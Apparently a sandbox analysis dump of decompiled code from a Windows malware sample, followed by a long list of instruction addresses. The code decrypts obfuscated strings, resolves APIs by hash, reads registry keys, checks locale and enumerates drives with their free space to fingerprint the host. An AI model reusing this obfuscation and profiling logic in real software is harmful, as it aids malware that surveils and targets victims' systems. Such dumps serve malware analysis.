							_v16 = 0xe916289b;
							_v12 = 0xf487ddbb;
							_v8 = 0x25f21df0;
							_t719 = E00407563();
							_t803 =  *(_t727 + 0x20);
							if( *_t803 == 0) {
								wsprintfW(_t803, _t719);
							}
						}
					}
					_t573 = 0;
				}
				_t863 =  *(_t727 + 0x30) - _t573;
				if( *(_t727 + 0x30) != _t573) {
					_t702 = VirtualAlloc(_t573, 0x80, 0x3000, 4); // executed
					 *(_t727 + 0x38) = _t702;
					_t703 = 0x5a;
					_v188 = _t703;
					_v224 = 0x3eb5a07b;
					_v220 = 0x501cc987;
					_v216 = 0x91f24ca6;
					_v212 = 0xeff070af;
					_v208 = 0xcbc6343e;
					_v204 = 0xcbc63406;
					_v200 = 0xfe9dcc17;
					_v196 = 0x77d751af;
					_v192 = 0x8c602f84;
					_v187 = 0x62ce2df5;
					_v183 = 0xa2e22e;
					_v179 = 0x39402358;
					_v175 = 0x491a3beb;
					_v171 = 0xf80718b2;
					_v167 = 0xb0d1ff93;
					_v163 = 0xb09b2803;
					_v159 = 0x8b315790;
					_v155 = 0x2f40c74a;
					_v151 = 0x8949773b;
					_v147 = 0x5ec7;
					_v145 = 0x2a;
					_t705 = E00407563( &_v224);
					_v100 = 0xec65eb2f;
					_t108 =  &_v100; // 0xec65eb2f
					_v96 = 0x69f22afb;
					_v92 = 0x440e813;
					_v88 = 0xcdd2a2c8;
					_v84 = 0x8d13ee6a;
					_v80 = 0x8d13ee7c;
					_v76 = 0xbc52772d;
					_v72 = 0xc71b1ac8;
					_v68 = 0xef22e9bc;
					_v64 = 0x90714dd1;
					_v60 = 0x9098c725;
					_v56 = 0x6573;
					_t708 = E0040BACB(_t727, _t705, _t863, 0x80000001, _t705, E00407563(_t108),  *(_t727 + 0x38), 0x40, 0); // executed
					if(_t708 == 0) {
						 *(_t727 + 0x30) = _t708;
						VirtualFree( *(_t727 + 0x38), _t708, 0x8000);
					}
					_t573 = 0;
				}
				if( *((intOrPtr*)(_t727 + 0x3c)) == _t573) {
					L28:
					_t874 =  *((intOrPtr*)(_t727 + 0x48)) - _t573;
					if( *((intOrPtr*)(_t727 + 0x48)) != _t573) {
						_t670 = VirtualAlloc(_t573, 0x82, 0x3000, 4); // executed
						_t773 = 0x5c;
						 *(_t727 + 0x50) = _t670;
						_t671 = 0x41;
						_v227 = _t671;
						_v191 = _t671;
						_v256 = 0xf606d154;
						_v252 = 0x92a078d2;
						_v248 = _t773;
						_v247 = 0xe101cef1;
						_v243 = 0xdb83cd57;
						_v239 = 0x817d15bc;
						_v235 = 0x17d15bc;
						_v231 = 0x4761fec5;
						_v226 = 0x88b8ade;
						_v222 = 0x407b6fa3;
						_v218 = 0xd7ab0acc;
						_v214 = _t773;
						_v213 = 0xaf4e10d0;
						_v209 = 0x1f4e2f6;
						_v205 = 0xf52c6ce2;
						_v201 = 0x15fc86ec;
						_v197 = 0x449cb7bd;
						_v193 = 0x5d46;
						_v190 = 0x1ef97ecb;
						_v186 = 0x9220dfbf;
						_v182 = 0x8b24fa99;
						_v178 = 0x675aedf;
						_v174 = 0x27ba0666;
						_v170 = 0xae45f1c;
						_v166 = 0xc6e0628;
						_v162 = 0x50b223e2;
						_v158 = 0x48f2f83d;
						_v154 = 0x694a6b5f;
						_v150 = 0x12bf762c;
						_v146 = 0x5b8fa28;
						_t673 = E00407563( &_v256);
						_v100 = 0x3ea5a980;
						_v96 = 0x318b0182;
						_v92 = 0xfd640c12;
						_v88 = 0x48a88fec;
						_v84 = 0x3319681b;
						_v80 = 0x33196803;
						_v76 = 0x5f28160e;
						_v72 = 0x922985f6;
						_v68 = 0x3db7a390;
						_v64 = 0x7aa3bb56;
						_v60 = 0x70142546;
						_v56 = 0xc57d7a38;
						_t676 = E0040BACB(_t727, _t673, _t874, 0x80000002, _t673, E00407563( &_v100),  *(_t727 + 0x50), 0x80, 0); // executed
						if(_t676 == 0) {
							_v396 = 0xc3a06239;
							_v392 = 0xd95e07b2;
							_v388 = 0x1c12923d;
							_v384 = 0x940bc4f3;
							_v380 = 0x89f1215f;
							_v376 = 0x89f1212d;
							_v372 = 0x36a26c8d;
							_v368 = 0xd344a9c6;
							_v364 = 0xa0032cab;
							_v360 = 0x4f7c4e62;
							_v356 = 0x318e6300;
							_v352 = 0x2b728f9f;
							_v348 = 0xe43f05c;
							_v344 = 0xd1045b29;
							_v340 = 0xb11b2e6c;
							_v336 = 0x578958c2;
							_v332 = 0xe103a51f;
							_v328 = 0xe0c74219;
							_v324 = 0xcfdbf667;
							_v320 = 0xc9806080;
							_v316 = 0xe9c22fff;
							_v312 = 0x7552f756;
							_v308 = 0xc2bf7523;
							_v304 = 0xea002029;
							_v300 = 0xb8f7c192;
							_v296 = 0xf2052ec9;
							_v292 = 0x46abf682;
							_v288 = 0x43bd9d12;
							_v284 = 0x2175d1fc;
							_v280 = 0xbb2d54ee;
							_v276 = 0x2304c442;
							_v272 = 0x73ed52b9;
							_v268 = 0x7a3d3289;
							_v264 = 0x5262e7df;
							_v260 = 0x1f60;
							_t678 = E00407563( &_v396);
							_v52 = 0xd02291bc;
							_v48 = 0xbd5cc657;
							_v44 = 0xc7308d30;
							_v40 = 0xa7144d7;
							_v36 = 0x7b19556c;
							_v32 = 0x7b195574;
							_v28 = 0x1eda2e5e;
							_v24 = 0xc6a469bc;
							_v20 = 0x6a3f73b5;
							_v16 = 0x2c7936e1;
							_v12 = 0x32caa4d7;
							_v8 = 0x5db5b13;
							E0040BACB(_t727, _t678, 0, 0x80000002, _t678, E00407563( &_v52),  *(_t727 + 0x50), 0x80, 0);
							_v140 = 0xd8ffb5b9;
							_v136 = 0xdcc971b0;
							_v132 = 0xb635cb4b;
							_v128 = 0xa3068d3d;
							_v124 = 0xfaddfb28;
							_v120 = 0xfaddfb24;
							_v116 = 0x77975b1c;
							_v112 = 0x680bcc3d;
							_v108 = 0x33850aef;
							wsprintfW( *(_t727 + 0x50), E00407563( &_v140));
							_t850 = _t850 + 0xc;
						}
						_t573 = 0;
					}
					if( *((intOrPtr*)(_t727 + 0x54)) == _t573) {
						_t828 = 0x3000;
						goto L41;
					} else {
						_t662 = E004010BB(_t727, 1, 0x74b624be);
						 *_t662( &_v448); // executed
						_t828 = 0x3000;
						_t665 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
						 *(_t727 + 0x5c) = _t665;
						_t666 = _v448 & 0x0000ffff;
						if(_t666 == 0) {
							_v136 = 0x49443e68;
							_v132 = 0x441d2d0a;
							_v128 = 0x7ca5cd25;
							_v124 = 0xda42c4a4;
							_v120 = 0x3fe7ccea;
							_v116 = 0x3fe7cce2;
							_v112 = 0x9053e6d0;
							_v108 = 0x89d53faf;
							L37:
							_t667 =  &_v136;
							L38:
							wsprintfW( *(_t727 + 0x5c), E00407563(_t667));
							_t850 = _t850 + 0xc;
							_t573 = 0;
							L41:
							_t881 =  *(_t727 + 0x24) - _t573;
							if( *(_t727 + 0x24) != _t573) {
								_t573 = E00409A23(_t881, _t727 + 0x2c,  &_v408); // executed
								if(_t573 != 0) {
									_t573 = 0;
									__eflags = 0;
								} else {
									 *(_t727 + 0x24) = _t573;
								}
							}
							_t883 =  *((intOrPtr*)(_t727 + 0x60)) - _t573;
							if( *((intOrPtr*)(_t727 + 0x60)) != _t573) {
								_t625 = VirtualAlloc(_t573, 0x400, _t828, 4); // executed
								 *(_t727 + 0x68) = _t625;
								_t627 = VirtualAlloc(0, 0xe0c, _t828, 4); // executed
								_t836 = _t627;
								_v400 = _t836;
								_t328 = _t836 + 0x60c; // 0x60c
								_v104 = _t328;
								_t629 = E004010BB(_t727, 1, 0x78b00c68);
								 *_t629(_t836, 0x100);
								_t330 = _t836 + 0x600; // 0x600
								 *((short*)(_t836 + 6)) = 0;
								_t332 = _t836 + 0x400; // 0x400
								_t333 = _t836 + 0x604; // 0x604
								_t334 = _t836 + 0x608; // 0x608
								_t335 = _t836 + 0x200; // 0x200
								E0040956C(_t836, _t335, 0x100, _t330, _t334, _t333, _t332, 0x100); // executed
								_v376 = 0xafb9d954;
								_v372 = 0x910cc19a;
								_v368 = 0xd9d87c83;
								_v364 = 0xf4949e6c;
								_v360 = 0xecf86523;
								_v356 = 0xecf8657d;
								_v352 = 0x301174b0;
								_v348 = 0x7f333a8d;
								_v344 = 0x7cdee70;
								_v340 = 0x38c8485;
								_v336 = 0x5be64e8d;
								_v332 = 0xcecaf282;
								_v328 = 0xba5c0372;
								_v324 = 0xa7004501;
								_v320 = 0xe8e6db9f;
								_v316 = 0x4368d874;
								_v312 = 0x74b5c66c;
								_v308 = 0x335df27b;
								_v304 = 0xd234625;
								_v300 = 0x4c6d8e47;
								_v296 = 0x1a570963;
								_v292 = 0x6cd5993e;
								_v288 = 0x79ce376;
								_v284 = 0x59b892f7;
								_v280 = 0x22fc1903;
								_v276 = 0xc0c085cd;
								_v272 = 0x6b60cfb9;
								_v268 = 0xc822988a;
								_v264 = 0x8856cb16;
								_v260 = 0x7a41;
								_v404 = E00407563( &_v376);
								_v208 = 0xf92e43a8;
								_v204 = 0x8819d167;
								_v200 = 0x9ec9c6d1;
								_v196 = 0x59f79814;
								_v192 = 0x1e63a494;
								_v188 = 0x1e63a4bc;
								_v184 = 0x8eadb2ea;
								_v180 = 0xf355877b;
								_v176 = 0xa4560d77;
								_v172 = 0x2a97696e;
								_v168 = 0xf31f8870;
								_v164 = 0xff2e7f1a;
								_v160 = 0xeaf9c0e3;
								_v156 = 0x5078ad00;
								_v152 = 0xbae8f6d2;
								_v148 = 0x225ccb46;
								_t640 = E00407563( &_v208);
								_v100 = 0x4ae839a1;
								_v96 = 0x60d6ea4b;
								_v92 = 0x98a590be;
								_v88 = 0x720f0d55;
								_v84 = 0x3ab78cd6;
								_v80 = 0x3ab78cc0;
								_v76 = 0x130ea4fd;
								_v72 = 0x563def;
								_v68 = 0x48a2aea4;
								_v64 = 0xf80e3376;
								_v60 = 0x82104135;
								_v56 = 0xbf8c;
								_t642 = E00407563( &_v100);
								_t853 = _t850 + 0x2c;
								_v408 = _t642;
								_t644 = E0040BACB(_t727, _t640, _t883, 0x80000002, _v404, _t640, _v104, 0x80, 0); // executed
								_t838 = _v104;
								if(_t644 != 0) {
									E0040BACB(_t727, _t838, 0, 0x80000002, _v404, _v408,  &(_t838[lstrlenW(_t838)]), 0x80, 0); // executed
								}
								wsprintfW( *(_t727 + 0x68), L"%d",  *((intOrPtr*)(_v400 + 0x600)));
								E00401A92( *(_t727 + 0x68), _t838);
								_v48 = 0xe0783ac7;
								_v44 = 0xe3b27d46;
								_v40 = 0x584c5bd1;
								_v36 = 0x753570c3;
								_v32 = 0xb80d3a61;
								_v28 = 0xb80d3a75;
								_v24 = 0xcc020106;
								_v20 = 0x5c24a27a;
								_v16 = 0x872c68f1;
								_v12 = 0x79c7b303;
								_v8 = 0x6eee2516;
								E00407563( &_v48);
								_t850 = _t853 + 0x18;
								 *((intOrPtr*)(_t727 + 0x6c)) = 0;
								_t651 = lstrlenW( *(_t727 + 0x68));
								_t652 = E004010BB(_t727, 2, 0x687b7023);
								_t653 =  *_t652(0x29a,  *(_t727 + 0x68), _t651 + _t651);
								_t840 = _v400;
								 *((intOrPtr*)(_t727 + 0x6c)) = _t653;
								 *((intOrPtr*)(_t727 + 0x70)) =  *((intOrPtr*)(_t840 + 0x600));
								E004010BB(_t727, 1, 0x3a35705f);
								VirtualFree(_t840, 0, 0x8000); // executed
								_t573 = 0;
							}
							if( *((intOrPtr*)(_t727 + 0x74)) == _t573) {
								L61:
								return 1;
							} else {
								_v576 = 0xc6b23a8;
								_v572 = 0x56e1a542;
								_v568 = 0x6f728da2;
								_v564 = 0xaa540357;
								_v560 = 0x9d00e245;
								_v556 = 0x9d00e255;
								_v552 = 0x4d716505;
								_v548 = 0x19648e4;
								_v544 = 0x920a04a;
								_v540 = 0x429a59b2;
								_v408 = E00407563( &_v576);
								_v624 = 0xfbd7728;
								_v620 = 0x76ee3387;
								_v616 = 0xa71ebe8f;
								_v612 = 0x4ab47044;
								_v608 = 0x9ebd014d;
								_v604 = 0x9ebd0155;
								_v600 = 0x56543072;
								_v596 = 0x40d46cb1;
								_v592 = 0x888dc2f4;
								_v588 = 0x7e42d9ed;
								_v584 = 0x4a34bd60;
								_v580 = 0xe1be0417;
								_v496 = E00407563( &_v624);
								_v96 = 0xc64554f3;
								_v92 = 0xf9a8528c;
								_v88 = 0xca803f37;
								_v84 = 0xe786986e;
								_v80 = 0x28c56a87;
								_v76 = 0x28c56a93;
								_v72 = 0x9d5e5e07;
								_v68 = 0x1b0ae20b;
								_v64 = 0x6d5cd432;
								_v60 = 0xde0b95f2;
								_v56 = 0x92f6d37c;
								_t581 = E00407563( &_v96);
								_v536 = 0xd4761a40;
								_t582 = 0x5a;
								_v501 = _t582;
								_v532 = 0xc4e29673;
								_v528 = 0x90452339;
								_v524 = 0x7d15a3c3;
								_v520 = 0xbb4aa18f;
								_v516 = 0xbb4aa183;
								_v512 = 0xe8e7ee9a;
								_v508 = 0x5365743b;
								_v504 = 0x3847;
								_v502 = 0xd9;
								_t584 = E00407563( &_v536);
								_v488 = 0xe04f4b08;
								_v484 = 0x89567728;
								_v480 = 0xdad92fc1;
								_v476 = 0x7c984ffa;
								_v472 = 0x1266490e;
								_v468 = 0x12664900;
								_v464 = 0x8d95ff33;
								_v460 = 0x6dd3ed01;
								_v456 = 0xf51d713f;
								_v452 = 0x3f5d;
								_t586 = E00407563( &_v488);
								_v448 = 0x33cf1c30;
								_v444 = 0x5635bcbf;
								_v440 = 0xc2adf610;
								_v436 = 0xce226f13;
								_v432 = 0x6f;
								_t587 = 0x5a;
								_v431 = _t587;
								_v427 = _t587;
								_v430 = 0x3702;
								_v428 = 0x63;
								_v426 = 0x77103702;
								_v422 = 0xab2625c0;
								_v418 = 0x578ed080;
								_v414 = 0xd36f;
								_v112 = E00407563( &_v448);
								_v132 = _v408;
								_v44 = 0xf934fac5;
								_v40 = 0xe1fc0107;
								_v36 = 0xad1a4275;
								_v32 = 0x9711e10b;
								_v28 = 0xcc97613e;
								_v24 = 0xcc97612e;
								_v20 = 0xa39d7ddd;
								_v16 = 0xf9858932;
								_v12 = 0x77d73823;
								_v8 = 0xe776012d;
								_v128 = _v496;
								_v124 = _t581;
								_v120 = _t584;
								_v116 = _t586;
								_t591 = E00407563( &_v44);
								_t851 = _t850 + 0x1c;
								_v108 = _t591;
								_t593 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
								_t729 = _v500;
								_t734 = 0x41;
								 *(_t729 + 0x7c) = _t593;
								_t594 =  &_v196;
								_t812 = 0x5a;
								do {
									 *_t594 = _t734;
									_t734 = _t734 + 1;
									_t594 = _t594 + 2;
								} while (_t734 <= _t812);
								_t595 =  *L"?:\\"; // 0x3a003f
								_v632 = _t595;
								_t596 =  *0x411994; // 0x5c
								_v628 = _t596;
								_t597 = 0;
								_v104 = 0;
								do {
									_v632 =  *((intOrPtr*)(_t849 + _t597 * 2 - 0xc0));
									E004010BB(_t729, 1, 0x399354d8);
									_t600 = GetDriveTypeW( &_v632); // executed
									_t822 = _t600;
									if(_t822 > 2 && _t822 != 5) {
										_v628 = 0;
										_t604 = E004010BB(_t729, 1, 0x2ca1b5f0);
										 *_t604( *(_t729 + 0x7c),  &_v632);
										_t606 = 0x5c;
										_v628 = _t606;
										E00401A92( *(_t729 + 0x7c),  *((intOrPtr*)(_t849 + _t822 * 4 - 0x80)));
										_t608 = E004010BB(_t729, 1, 0x2ca1b5f0);
										_t851 = _t851 + 0x10;
										 *_t608( *(_t729 + 0x7c), "_");
										E004010BB(_t729, 1, 0x582ad579);
										_t611 = GetDiskFreeSpaceW( &_v632,  &_v408,  &_v496,  &_v400,  &_v404); // executed
										if(_t611 == 0) {
											_t832 =  *(_t729 + 0x7c);
											_t612 = E004010BB(_t729, 1, 0x2ca1b5f0);
											_push(L"0,");
										} else {
											_t730 = E00401030(_v404, 0, _v408 * _v496, 0);
											_t824 = _t812;
											_v492 = _t730 - E00401030(_v400, 0, _v408 * _v496, 0);
											asm("sbb esi, edx");
											_t619 = lstrlenW( *(_v500 + 0x7c));
											_push(_t824);
											wsprintfW( *(_v500 + 0x7c) + _t619 + _t619, L"%I64u/", _t730);
											_t729 = _v500;
											_t622 = lstrlenW( *(_t729 + 0x7c));
											_push(_t824);
											wsprintfW( *(_t729 + 0x7c) + _t622 + _t622, L"%I64u", _v492);
											_t832 =  *(_t729 + 0x7c);
											_t612 = E004010BB(_t729, 1, 0x2ca1b5f0);
											_t851 = _t851 + 0x28;
											_push(",");
										}
										 *_t612(_t832);
									}
									_t597 =  &(_v104[0]);
									_v104 = _t597;
								} while (_t597 < 0x1b);
								 *((short*)( *(_t729 + 0x7c) + lstrlenW( *(_t729 + 0x7c)) * 2 - 2)) = 0;
								goto L61;
							}
						}
						if(_t666 == 9) {
							_v136 = 0x6e408b83;
							_v132 = 0x5d4dce00;
							_v128 = 0x547b1a38;
							_v124 = 0x88f93f8e;
							_v120 = 0x1792f6b6;
							_v116 = 0x1792f6be;
							_v112 = 0xebf7f616;
							_v108 = 0x68375706;
							goto L37;
						}
						_v488 = 0xc0d65072;
						_t667 =  &_v488;
						_v484 = 0x854771a3;
						_v480 = 0x649e6aa0;
						_v476 = 0xe4f8ebe;
						_v472 = 0x2e764e0a;
						_v468 = 0x2e764e1a;
						_v464 = 0x80c60ebe;
						_v460 = 0x65d9b186;
						_v456 = 0xa493a0d7;
						_v452 = 0x28d0afc;
						goto L38;
					}
				} else {
					_t685 = VirtualAlloc(_t573, 0x8a, 0x3000, 4); // executed
					_t843 = _t685;
					_v104 = _t843;
					_t844 = _t843 + 0xe;
					_t687 = VirtualAlloc(0, 4, 0x3000, 4); // executed
					 *(_t727 + 0x44) = _t687;
					_v216 = 0xdb100c52;
					_v404 = 0;
					_v400 = 1;
					_v492 = 1;
					_v212 = 0x1c24b8e2;
					_v208 = 0xd260a9d0;
					_v204 = 0xc03d2f11;
					_v200 = 0x96b19e87;
					_v196 = 0x96b19eb7;
					_v192 = 0x7308fb86;
					_v188 = 0x5391ab02;
					_v184 = 0xd8a46755;
					_v180 = 0x9d7dae2d;
					_v176 = 0xf239674c;
					_v172 = 0xf6c4d4c2;
					_v168 = 0x259c1b90;
					_v164 = 0xcf5e809c;
					_v160 = 0x9630fc70;
					_v156 = 0xf98dd77e;
					_v152 = 0xef433f22;
					_v148 = 0x26e8abc3;
					_v496 = E00407563( &_v216);
					_v48 = 0x69ade715;
					_v44 = 0xf272d46d;
					_v40 = 0x4fba8bbf;
					_v36 = 0xd74233dc;
					_v32 = 0xbe6f2da1;
					_v28 = 0xbe6f2db3;
					_v24 = 0xe032c756;
					_v20 = 0xac4eabdd;
					_v16 = 0x414ef2a7;
					_v12 = 0x67e8f678;
					_v8 = 0xfbf2;
					_t692 = E00407563( &_v48);
					_t786 = _v492;
					_v408 = _t692;
					do {
						wsprintfW(_v104, L"%d", _t786);
						_t850 = _t850 + 0xc;
						_v492 = _v492 + 1;
						_t695 = E0040BACB(_t727, _t844, 1, 0x80000001, _v496, _v104, _t844, 0x80, 0); // executed
						if(_t695 == 0) {
							_t696 = 0;
							_v400 = 0;
							L22:
							_t815 = _v404;
							goto L23;
						}
						if(E00401AC8(_t844, _v408) != 0) {
							_t696 = _v400;
							goto L22;
						}
						wsprintfW( *(_t727 + 0x44), "1");
						_t815 = 1;
						_t696 = 0;
						_v404 = 1;
						_v400 = 0;
						L23:
						_t786 = _v492;
					} while (_t786 != 9 && _t696 != 0);
					if(_t815 == 0) {
						wsprintfW( *(_t727 + 0x44), "0");
					}
					VirtualFree(_v104, 0, 0x8000); // executed
					_t573 = 0;
					goto L28;
				}
			}

0x0040a4eb
0x0040a4ed
0x0040a4f1
0x0040a4f9
0x0040a508
0x0040a50e
0x0040a510
0x0040a51e
0x0040a521
0x0040a52d
0x0040a52f
0x0040a52f
0x0040a534
0x0040a540
0x0040a547
0x0040a54d
0x0040a556
0x0040a559
0x0040a565
0x0040a567
0x0040a567
0x0040a572
0x0040a585
0x0040a58b
0x0040a58e
0x0040a590
0x0040a59c
0x0040a5a7
0x0040a5b1
0x0040a5bb
0x0040a5c5
0x0040a5cf
0x0040a5d9
0x0040a5e3
0x0040a5ed
0x0040a5f7
0x0040a601
0x0040a60b
0x0040a615
0x0040a61f
0x0040a629
0x0040a633
0x0040a63d
0x0040a647
0x0040a651
0x0040a65b
0x0040a665
0x0040a66f
0x0040a679
0x0040a683
0x0040a68d
0x0040a697
0x0040a6a1
0x0040a6ab
0x0040a6b5
0x0040a6bf
0x0040a6c9
0x0040a6d3
0x0040a6dc
0x0040a6e5
0x0040a6ef
0x0040a6f6
0x0040a6fd
0x0040a707
0x0040a711
0x0040a71b
0x0040a725
0x0040a72f
0x0040a739
0x0040a743
0x0040a74d
0x0040a76f
0x0040a779
0x0040a77a
0x0040a7e1
0x0040a7e8
0x0040a7ef
0x0040a7f6
0x0040a7fd
0x0040a804
0x0040a80b
0x0040a812
0x0040a819
0x0040a820
0x0040a827
0x0040a837
0x0040a839
0x0040a77c
0x0040a77c
0x0040a783
0x0040a78a
0x0040a791
0x0040a798
0x0040a79f
0x0040a7a6
0x0040a7ad
0x0040a7b4
0x0040a7bb
0x0040a7c2
0x0040a7c9
0x0040a7cf
0x0040a7d7
0x0040a7db
0x0040a7de
0x0040a7d7
0x0040a77a
0x0040a83c
0x0040a83c
0x0040a83e
0x0040a841
0x0040a854
0x0040a85a
0x0040a85f
0x0040a860
0x0040a86d
0x0040a877
0x0040a881
0x0040a88b
0x0040a895
0x0040a89f
0x0040a8a9
0x0040a8b3
0x0040a8bd
0x0040a8c7
0x0040a8d1
0x0040a8db
0x0040a8e5
0x0040a8ef
0x0040a8f9
0x0040a903
0x0040a90d
0x0040a917
0x0040a921
0x0040a92b
0x0040a934
0x0040a93b
0x0040a942
0x0040a949
0x0040a94c
0x0040a954
0x0040a95b
0x0040a962
0x0040a969
0x0040a970
0x0040a977
0x0040a97e
0x0040a985
0x0040a98c
0x0040a993
0x0040a9b1
0x0040a9b8
0x0040a9c3
0x0040a9c6
0x0040a9c6
0x0040a9cc
0x0040a9cc
0x0040a9d1
0x0040abfa
0x0040abfa
0x0040abfd
0x0040ac10
0x0040ac18
0x0040ac19
0x0040ac1e
0x0040ac1f
0x0040ac25
0x0040ac32
0x0040ac3c
0x0040ac46
0x0040ac4c
0x0040ac56
0x0040ac60
0x0040ac6a
0x0040ac74
0x0040ac7e
0x0040ac88
0x0040ac92
0x0040ac9c
0x0040aca2
0x0040acac
0x0040acb6
0x0040acc0
0x0040acca
0x0040acd4
0x0040acdd
0x0040ace7
0x0040acf1
0x0040acfb
0x0040ad05
0x0040ad0f
0x0040ad19
0x0040ad23
0x0040ad2d
0x0040ad37
0x0040ad41
0x0040ad4b
0x0040ad55
0x0040ad5c
0x0040ad66
0x0040ad6e
0x0040ad75
0x0040ad7c
0x0040ad83
0x0040ad8a
0x0040ad91
0x0040ad98
0x0040ad9f
0x0040ada6
0x0040adad
0x0040adcf
0x0040add6
0x0040ade2
0x0040aded
0x0040adf7
0x0040ae01
0x0040ae0b
0x0040ae15
0x0040ae1f
0x0040ae29
0x0040ae33
0x0040ae3d
0x0040ae47
0x0040ae51
0x0040ae5b
0x0040ae65
0x0040ae6f
0x0040ae79
0x0040ae83
0x0040ae8d
0x0040ae97
0x0040aea1
0x0040aeab
0x0040aeb5
0x0040aebf
0x0040aec9
0x0040aed3
0x0040aedd
0x0040aee7
0x0040aef1
0x0040aefb
0x0040af05
0x0040af0f
0x0040af19
0x0040af23
0x0040af2d
0x0040af37
0x0040af40
0x0040af47
0x0040af51
0x0040af59
0x0040af60
0x0040af67
0x0040af6e
0x0040af75
0x0040af7c
0x0040af83
0x0040af8a
0x0040af91
0x0040af98
0x0040afba
0x0040afc5
0x0040afd0
0x0040afda
0x0040afe1
0x0040afe8
0x0040afef
0x0040aff6
0x0040affd
0x0040b004
0x0040b014
0x0040b016
0x0040b016
0x0040b019
0x0040b019
0x0040b01e
0x0040b162
0x00000000
0x0040b024
0x0040b02b
0x0040b039
0x0040b03d
0x0040b048
0x0040b04e
0x0040b051
0x0040b05a
0x0040b125
0x0040b12f
0x0040b136
0x0040b13d
0x0040b144
0x0040b14b
0x0040b152
0x0040b159
0x0040b10c
0x0040b10c
0x0040b112
0x0040b11c
0x0040b11e
0x0040b121
0x0040b167
0x0040b167
0x0040b16a
0x0040b179
0x0040b180
0x0040b187
0x0040b187
0x0040b182
0x0040b182
0x0040b182
0x0040b180
0x0040b18f
0x0040b192
0x0040b1a1
0x0040b1aa
0x0040b1b5
0x0040b1bb
0x0040b1c4
0x0040b1ca
0x0040b1d0
0x0040b1d3
0x0040b1e0
0x0040b1e4
0x0040b1ea
0x0040b1f4
0x0040b1fb
0x0040b202
0x0040b20b
0x0040b213
0x0040b21e
0x0040b229
0x0040b233
0x0040b23d
0x0040b247
0x0040b251
0x0040b25b
0x0040b265
0x0040b26f
0x0040b279
0x0040b283
0x0040b28d
0x0040b297
0x0040b2a1
0x0040b2ab
0x0040b2b5
0x0040b2bf
0x0040b2c9
0x0040b2d3
0x0040b2dd
0x0040b2e7
0x0040b2f1
0x0040b2fb
0x0040b305
0x0040b30f
0x0040b319
0x0040b323
0x0040b32d
0x0040b337
0x0040b341
0x0040b34f
0x0040b355
0x0040b35f
0x0040b369
0x0040b373
0x0040b37d
0x0040b387
0x0040b397
0x0040b3a2
0x0040b3ac
0x0040b3b6
0x0040b3c0
0x0040b3ca
0x0040b3d4
0x0040b3de
0x0040b3e8
0x0040b3f2
0x0040b3fc
0x0040b403
0x0040b40d
0x0040b415
0x0040b41c
0x0040b423
0x0040b42a
0x0040b431
0x0040b438
0x0040b43f
0x0040b446
0x0040b44d
0x0040b454
0x0040b45a
0x0040b45f
0x0040b462
0x0040b481
0x0040b486
0x0040b48b
0x0040b4af
0x0040b4af
0x0040b4c8
0x0040b4d2
0x0040b4da
0x0040b4e2
0x0040b4e9
0x0040b4f0
0x0040b4f7
0x0040b4fe
0x0040b505
0x0040b50c
0x0040b513
0x0040b51a
0x0040b521
0x0040b528
0x0040b52d
0x0040b532
0x0040b538
0x0040b548
0x0040b556
0x0040b558
0x0040b55e
0x0040b56e
0x0040b571
0x0040b581
0x0040b583
0x0040b583
0x0040b588
0x0040bac2
0x0040baca
0x0040b58e
0x0040b594
0x0040b59f
0x0040b5a9
0x0040b5b3
0x0040b5bd
0x0040b5c7
0x0040b5d1
0x0040b5db
0x0040b5e5
0x0040b5ef
0x0040b5fe
0x0040b60b
0x0040b615
0x0040b61f
0x0040b629
0x0040b633
0x0040b63d
0x0040b647
0x0040b651
0x0040b65b
0x0040b665
0x0040b66f
0x0040b679
0x0040b688
0x0040b692
0x0040b699
0x0040b6a0
0x0040b6a7
0x0040b6ae
0x0040b6b5
0x0040b6bc
0x0040b6c3
0x0040b6ca
0x0040b6d1
0x0040b6d8
0x0040b6df
0x0040b6e6
0x0040b6f2
0x0040b6f3
0x0040b700
0x0040b70a
0x0040b714
0x0040b71e
0x0040b728
0x0040b732
0x0040b73c
0x0040b746
0x0040b74f
0x0040b756
0x0040b75d
0x0040b76d
0x0040b778
0x0040b782
0x0040b78c
0x0040b796
0x0040b7a0
0x0040b7aa
0x0040b7b4
0x0040b7be
0x0040b7c7
0x0040b7ce
0x0040b7d8
0x0040b7e2
0x0040b7ec
0x0040b7f6
0x0040b7ff
0x0040b800
0x0040b806
0x0040b813
0x0040b81c
0x0040b823
0x0040b82d
0x0040b837
0x0040b841
0x0040b855
0x0040b85b
0x0040b865
0x0040b86c
0x0040b873
0x0040b87a
0x0040b881
0x0040b888
0x0040b88f
0x0040b896
0x0040b89d
0x0040b8a4
0x0040b8ab
0x0040b8ae
0x0040b8b1
0x0040b8b4
0x0040b8b7
0x0040b8bc
0x0040b8bf
0x0040b8d1
0x0040b8d7
0x0040b8df
0x0040b8e2
0x0040b8e5
0x0040b8eb
0x0040b8ec
0x0040b8ec
0x0040b8ef
0x0040b8f0
0x0040b8f3
0x0040b8f8
0x0040b8fd
0x0040b903
0x0040b908
0x0040b90e
0x0040b910
0x0040b913
0x0040b922
0x0040b929
0x0040b937
0x0040b939
0x0040b93e
0x0040b959
0x0040b960
0x0040b96f
0x0040b973
0x0040b978
0x0040b982
0x0040b992
0x0040b997
0x0040b9a0
0x0040b9a9
0x0040b9d3
0x0040b9d7
0x0040ba89
0x0040ba8f
0x0040ba96
0x0040b9dd
0x0040b9fa
0x0040b9fc
0x0040ba1a
0x0040ba20
0x0040ba25
0x0040ba33
0x0040ba46
0x0040ba48
0x0040ba54
0x0040ba5f
0x0040ba6e
0x0040ba70
0x0040ba7a
0x0040ba7f
0x0040ba82
0x0040ba82
0x0040ba9c
0x0040ba9c
0x0040baa1
0x0040baa2
0x0040baa5
0x0040babc
0x00000000
0x0040babc
0x0040b588
0x0040b063
0x0040b0d1
0x0040b0db
0x0040b0e2
0x0040b0e9
0x0040b0f0
0x0040b0f7
0x0040b0fe
0x0040b105
0x00000000
0x0040b105
0x0040b065
0x0040b06f
0x0040b075
0x0040b07f
0x0040b089
0x0040b093
0x0040b09d
0x0040b0a7
0x0040b0b1
0x0040b0bb
0x0040b0c5
0x00000000
0x0040b0c5
0x0040a9d7
0x0040a9e4
0x0040a9ec
0x0040a9f7
0x0040a9fa
0x0040a9fe
0x0040aa04
0x0040aa0b
0x0040aa15
0x0040aa22
0x0040aa29
0x0040aa2f
0x0040aa39
0x0040aa43
0x0040aa4d
0x0040aa57
0x0040aa61
0x0040aa6b
0x0040aa75
0x0040aa7f
0x0040aa89
0x0040aa93
0x0040aa9d
0x0040aaa7
0x0040aab1
0x0040aabb
0x0040aac5
0x0040aacf
